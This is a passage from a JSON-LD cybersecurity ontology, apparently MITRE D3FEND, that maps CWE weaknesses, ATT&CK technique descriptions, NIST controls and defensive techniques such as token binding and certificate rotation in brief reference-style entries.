      "d3f:definition": "The product accepts input in the form of a backslash absolute path ('\\absolute\\pathname\\here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Traversal: '\\absolute\\pathname\\here'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-36"
      }
    },
    {
      "@id": "d3f:Reference-IdentificationOfVisualInternationalDomainNameCollisions-VerisignInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10599836B2/en"
      },
      "d3f:kb-abstract": "Fuzzy OCR to detect domain name homoglyph attacks.\n\nVarious embodiments of the invention disclosed herein provide techniques for detecting a homograph attack. An IDN collision detection server retrieves a first domain name that includes a punycode element. The IDN collision detection server converts the first domain into a second domain name that includes a Unicode character corresponding to the punycode element. The IDN collision detection server converts the second domain name into an image. The IDN collision detection server performs one or more optical character recognition operations on the image to generate a textual string associated with the image. The IDN collision detection server determines that the textual string matches at least a portion of a third domain name.",
      "d3f:kb-author": "Ben McCarty, Preston Zeh",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-organization": "Verisign Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDetection"
      },
      "d3f:kb-reference-title": "Identification of visual international domain name collisions",
      "rdfs:label": "Reference - Identification of visual international domain name collisions - Verisign Inc"
    },
    {
      "@id": "d3f:CWE-1297",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1297",
      "d3f:definition": "The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors.",
      "rdfs:label": "Unprotected Confidential Information on Device is Accessible by OSAT Vendors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:BuildTool",
      "@type": "owl:Class",
      "d3f:definition": "A tool that automates the process of creating a software build and the associated processes including: compiling computer source code into binary code, packaging binary code, and running automated tests.",
      "rdfs:label": "Build Tool",
      "rdfs:seeAlso": {
        "@id": "dbr:Build_automation"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DeveloperApplication"
      },
      "skos:altLabel": "Build Automation Tool"
    },
    {
      "@id": "d3f:CCI-002661_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors inbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002661"
    },
    {
      "@id": "d3f:ReinforcementLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RL",
      "d3f:definition": "Reinforcement Learning is a subjugate technique of machine learning that uses feedback to reinforce good or valid rules and lessen the reliance of bad or ineffective rules",
      "d3f:kb-article": "## References\nReinforcement learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Reinforcement_learning).",
      "rdfs:label": "Reinforcement Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:LinuxRenameat2",
      "@type": "owl:Class",
      "d3f:definition": "Change the name or location of a file. Additional flags argument.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/renameat2.2.html"
      },
      "rdfs:label": "Linux Renameat2",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIMoveFile"
      }
    },
    {
      "@id": "d3f:loads",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x loads y: The technique or process x transfers a software from storage y to a computer's memory for subsequent execution.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02236692-v"
      },
      "rdfs:label": "loads",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Restricted Tool Use",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "MA-3(4)"
    },
    {
      "@id": "d3f:has-audience",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-audience",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-use-case-object-property"
      }
    },
    {
      "@id": "d3f:CWE-325",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-325",
      "d3f:definition": "The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.",
      "rdfs:label": "Missing Cryptographic Step",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:LocalAuthenticationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:definition": "A local authentication service running on a host can authenticate a user logged into just that local host computer.",
      "rdfs:label": "Local Authentication Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "_:N08b9013b0f3e494a91ccff636d52d250"
        }
      ]
    },
    {
      "@id": "_:N08b9013b0f3e494a91ccff636d52d250",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:ContentFormatConversion",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentFormatConversion"
      ],
      "d3f:d3fend-id": "D3-CFC",
      "d3f:definition": "Content format conversion is mechanical transformation from one format to another which may be normalization or specifically flattening.",
      "d3f:kb-article": "## How it works\n\nThis technique may enhance security by transforming files into safer or normalized formats.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "rdfs:label": "Content Format Conversion",
      "rdfs:subClassOf": {
        "@id": "d3f:ContentModification"
      }
    },
    {
      "@id": "d3f:ApproximateStringMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ASM",
      "d3f:definition": "Approximate string matching is a form of string matching that allows errrors.",
      "d3f:kb-article": "## References\n1. Navarro, G. (2001). A guided tour to approximate string matching. _ACM Computing Surveys_, 33(1), 31-88. [Link](https://doi.org/10.1145/375360.375365)",
      "rdfs:label": "Approximate String Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:T1029",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1029",
      "d3f:definition": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Scheduled Transfer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N07bce3f06d874a948bb3046edd509f6a"
        }
      ]
    },
    {
      "@id": "_:N07bce3f06d874a948bb3046edd509f6a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CertificateRotation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CertificateRotation"
      ],
      "d3f:d3fend-id": "D3-CERO",
      "d3f:definition": "Certificate rotation involves replacing digital certificates and their private keys to maintain cryptographic integrity and trust, mitigating key compromise risks and ensuring continuous secure communications.",
      "d3f:kb-article": "## How it works\n\nCertificate rotation should be performed when:\n- Any certificate expires.\n- A new CA authority is substituted for the old, thus requiring a replacement root certificate.\n- New or modified constraints need to be imposed on one or more certificates.\n- A security breach has occurred.\n\nConsiderations:\n- Managing certificate rotation across an enterprise can be complex. Automated solutions, sold by multiple vendors, should be considered to manage this complexity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-PasswordandKeyRotation-SSH"
      },
      "d3f:regenerates": {
        "@id": "d3f:Certificate"
      },
      "rdfs:label": "Certificate Rotation",
      "rdfs:seeAlso": {
        "@id": "https://docs.couchbase.com/server/7.0/manage/manage-security/rotate-server-certificates.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialRotation"
        },
        {
          "@id": "_:Nc974fda545d84e18875d764fb8674f7e"
        }
      ]
    },
    {
      "@id": "_:Nc974fda545d84e18875d764fb8674f7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:regenerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:CWE-531",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-531",
      "d3f:definition": "Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions.",
      "rdfs:label": "Inclusion of Sensitive Information in Test Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-540"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyTriggeredBlackHoleFiltering-Cisco",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisco.com/c/dam/en_us/about/security/intelligence/blackhole.pdf"
      },
      "d3f:kb-organization": "Cisco",
      "d3f:kb-reference-title": "Remotely Triggered Black Hole Filtering - Destination Based and Source Based",
      "rdfs:label": "Reference - Remotely Triggered Black Hole FIltering - Cisco"
    },
    {
      "@id": "d3f:CWE-1224",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1224",
      "d3f:definition": "The hardware design control register \"sticky bits\" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software.",
      "rdfs:label": "Improper Restriction of Write-Once Bit Fields",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1518.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1518.002",
      "d3f:definition": "Adversaries may attempt to get a listing of backup software or configurations that are installed on a system. Adversaries may use this information to shape follow-on behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).",
      "rdfs:label": "Backup Software Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:T1518"
      }
    },
    {
      "@id": "d3f:ActiveLogicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ActiveLogicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-ALLM",
      "d3f:definition": "Active logical link mapping sends and receives network traffic as a means to map the whole data link layer, where the links represent logical data flows rather than physical connection",
      "d3f:kb-article": "## How it works\n\nActive logical link mapping establishes awareness of logical links in the network by sending data over the network to gather information about logical connections in the network.\n\nTypically this will be achieved through network telemetry coordinated for network management and monitoring and will use a link layer discovery protocol such as LLDP and the information gathered and aggregated a higher levels using an application protocol such as SNMP.  The information may be polled by network management softare or configured once and then pushed from network sensors (or agents.)\n\nAnother means of establishing network connectivity is by means of sendingn traffic through the use of a tool such as traceroute, to determine the logical paths through the network architecture.\n\n## Considerations\n\n* Best practice is to encrypte network monitoring data and require authentication for queries or admin/management functions.\n* Push notifications reduce bandwidth necessary to capture and maintain information if reliable transport is used.\n* Special consideration should be made before using of active scanning in OT networks and OT-safe options chosen where available.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IdentificationOfTracerouteNodesAndAssociatedDevices"
        },
        {
          "@id": "d3f:Reference-SNMPNetworkAutoDiscovery"
        }
      ],
      "d3f:may-query": {
        "@id": "d3f:NetworkAgent"
      },
      "rdfs:label": "Active Logical Link Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LogicalLinkMapping"
        },
        {
          "@id": "_:Nf36b42c63d3c4849807e7016a2d6a660"
        }
      ]
    },
    {
      "@id": "_:Nf36b42c63d3c4849807e7016a2d6a660",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-query"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:T1055.014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:attack-id": "T1055.014",
      "d3f:definition": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:SystemCall"
      },
      "rdfs:label": "VDSO Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:Nd0dc167e7fb340fe8213ff5e1b52ace7"
        },
        {
          "@id": "_:N63113c30809a4f7d9a084e0a3e79662a"
        }
      ]
    },
    {
      "@id": "_:Nd0dc167e7fb340fe8213ff5e1b52ace7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N63113c30809a4f7d9a084e0a3e79662a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:CWE-826",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-826",
      "d3f:definition": "The product releases a resource that is still intended to be used by itself or another actor.",
      "rdfs:label": "Premature Release of Resource During Expected Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-666"
      }
    },
    {
      "@id": "d3f:strengthens",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x strengthens y: The technique x makes digital artifact y resistant (to harm or misuse.)",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00165779-v"
      },
      "rdfs:label": "strengthens",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:M1049",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Process Analysis and subclasses.",
      "d3f:related": [
        {
          "@id": "d3f:FileContentRules"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "rdfs:label": "Antivirus/Antimalware"
    },
    {
      "@id": "d3f:ATTACKEnterpriseTactic",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Tactic",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKEnterpriseThing"
      }
    },
    {
      "@id": "d3f:OTDeleteDataCommand",
      "@type": "owl:Class",
      "d3f:definition": "OT command that removes data on a remote device.",
      "rdfs:comment": "BACnet: removeListElement\nBACnet: deleteObject",
      "rdfs:label": "OT Delete Data Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:may-access",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-access y: The entity x may access the thing y; that is, 'x accesses y' may be true.",
      "owl:inverseOf": {
        "@id": "d3f:may-be-accessed-by"
      },
      "rdfs:label": "may-access",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:SSHConnectionRefuseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that an SSH connection attempt was refused, typically due to server-side restrictions or closed ports.",
      "rdfs:label": "SSH Connection Refuse Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionRefuseEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
      "@id": "d3f:neutralizes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x neutralizes y: The technique x makes the execution of actions of y ineffective by preventing or counterbalancing the effect of y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00471015-v"
      },
      "rdfs:label": "neutralizes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:T1036.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1036.012",
      "d3f:definition": "Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc.  The HTTP User-Agent request header is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting user agent.(Citation: Mozilla User Agent)",
      "rdfs:label": "Browser Fingerprint",
      "rdfs:subClassOf": {
        "@id": "d3f:T1036"
      }
    },
    {
      "@id": "d3f:T1563.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:RDPSession"
      },
      "d3f:attack-id": "T1563.002",
      "d3f:definition": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)",
      "rdfs:label": "RDP Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1563"
        },
        {
          "@id": "_:Nb7b2b78d88c648ebbc9ab9dc93942866"
        }
      ]
    },
    {
      "@id": "_:Nb7b2b78d88c648ebbc9ab9dc93942866",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPSession"
      }
    },
    {
      "@id": "d3f:OTDisconnectRemoteConnectionCommand",
      "@type": "owl:Class",
      "d3f:definition": "The Disconnect Request message is sent to the message receiver to indicate that the transmitter is terminating its TCP socket.",
      "rdfs:label": "OT Disconnect Remote Connection Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTConnectionCommand"
      }
    },
    {
      "@id": "d3f:T1217",
      "@type": "owl:Class",
      "d3f:attack-id": "T1217",
      "d3f:definition": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)",
      "rdfs:label": "Browser Information Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:T1142",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:EncryptedCredential"
      },
      "d3f:attack-id": "T1142",
      "d3f:definition": "Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1555.001",
      "rdfs:label": "Keychain",
      "rdfs:seeAlso": {
        "@id": "d3f:T1555.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N48676d3e9b74416bac7eecce28b1745b"
        }
      ]
    },
    {
      "@id": "_:N48676d3e9b74416bac7eecce28b1745b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "d3f:T1053.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.002",
      "d3f:definition": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.",
      "rdfs:label": "At",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Software and Firmware Integrity Verification",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PlatformHardening"
        }
      ],
      "rdfs:label": "SA-10(1)"
    },
    {
      "@id": "d3f:hardens",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x hardens y: The entity x fortifies entity y to reduce its weaknesses so y can better withstand attack or failure.",
      "rdfs:label": "hardens",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:counters"
        },
        {
          "@id": "d3f:d3fend-tactical-verb-property"
        }
      ]
    },
    {
      "@id": "d3f:may-evict",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may evict",
      "rdfs:label": "may-evict",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:may-counter"
        },
        {
          "@id": "d3f:may-counter-attack"
        }
      ]
    },
    {
      "@id": "d3f:CWE-14",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-14",
      "d3f:definition": "Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka \"dead store removal.\"",
      "rdfs:label": "Compiler Removal of Code to Clear Buffers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-733"
      }
    },
    {
      "@id": "d3f:TokenBinding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TokenBinding"
      ],
      "d3f:d3fend-id": "D3-TB",
      "d3f:definition": "Token binding is a security mechanism used to enhance the protection of tokens, such as cookies or OAuth tokens, by binding them to a specific connection.",
      "d3f:kb-article": "## How it works\n\nWhen issuing a security token to a client that supports Token Binding, a server includes the client's Token Binding ID (or its cryptographic hash) in the token. Later on, when a client presents a security token containing a Token Binding ID, the server verifies that the ID in the token matches the ID of the Token Binding established with the client. In the case of a mismatch, the server rejects the token.\n\n## Considerations\n\n- While industry participation in the standards process is widespread, browser support remains limited.\n- In practice, token-binding implementations are tied to Transport Security Layer (TLS).",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-RFC8471TheTokenBindingProtocolVersion1.0"
      },
      "d3f:strengthens": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:label": "Token Binding",
      "rdfs:seeAlso": {
        "@id": "dbr:Token_Binding"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:N27e5c385a19741cd9243ff61363e217a"
        }
      ]
    },
    {
      "@id": "_:N27e5c385a19741cd9243ff61363e217a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:CWE-1088",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1088",
      "d3f:definition": "The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite.",
      "rdfs:label": "Synchronous Access of Remote Resource without Timeout",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-821"
      }
    },
    {
      "@id": "d3f:DomainName",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A domain name is an identification string that defines a realm of administrative autonomy, authority or control within the Internet. Domain names are formed by the rules and procedures of the Domain Name System (DNS). Any name registered in the DNS is a domain name.Domain names are used in various networking contexts and application-specific naming and addressing purposes. In general, a domain name represents an Internet Protocol (IP) resource, such as a personal computer used to access the Internet, a server computer hosting a web site, or the web site itself or any other service communicated via the Internet. In 2015, 294 million domain names had been registered.",
      "d3f:identifies": {
        "@id": "d3f:IPAddress"
      },
      "rdfs:label": "Domain Name",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Identifier"
        },
        {
          "@id": "_:Nf69199cf432e4c2f96188aa756f689a1"
        }
      ]
    },
    {
      "@id": "_:Nf69199cf432e4c2f96188aa756f689a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IPAddress"
      }
    },
    {
      "@id": "d3f:T1514",
      "@type": "owl:Class",
      "d3f:attack-id": "T1514",
      "d3f:definition": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating.  This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.004",
      "rdfs:label": "Elevated Execution with Prompt",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:DHCPOfferEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP server sends an OFFER message to a client in response to a DISCOVER request, proposing an IP address and associated configuration parameters.",
      "rdfs:label": "DHCP Offer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N59f110c6fa6b4ab6b62bdba870998090"
        }
      ],
      "skos:altLabel": "DHCPOFFER"
    },
    {
      "@id": "_:N59f110c6fa6b4ab6b62bdba870998090",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPDiscoverEvent"
      }
    },
    {
      "@id": "d3f:LinuxUnlink",
      "@type": "owl:Class",
      "d3f:definition": "Delete a name and possibly the file it refers to.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/unlink.2.html"
      },
      "rdfs:label": "Linux Unlink",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:T0808",
      "@type": "owl:Class",
      "d3f:attack-id": "T0808",
      "d3f:definition": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Control Device Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Control Device Identification"
    },
    {
      "@id": "d3f:AutoregressiveModel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AM",
      "d3f:definition": "An autoregressive (AR) model is a representation of a type of random process; as such, it is used to describe certain time-varying processes in nature, economics, behavior, etc.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Autoregressive model. [Link](https://en.wikipedia.org/wiki/Autoregressive_model)",
      "d3f:synonym": "AR Model",
      "rdfs:label": "Autoregressive Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACE_DETACH",
      "@type": "owl:Class",
      "d3f:definition": "Restart the stopped tracee as for PTRACE_CONT, but first detach from it.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_DETACH",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIResumeProcess"
      }
    },
    {
      "@id": "d3f:Reference-OrganizationalManagementInSAPERPHCM",
      "@type": [
        "owl:NamedIndividual",
        "d3f:BookReference"
      ],
      "d3f:has-link": {
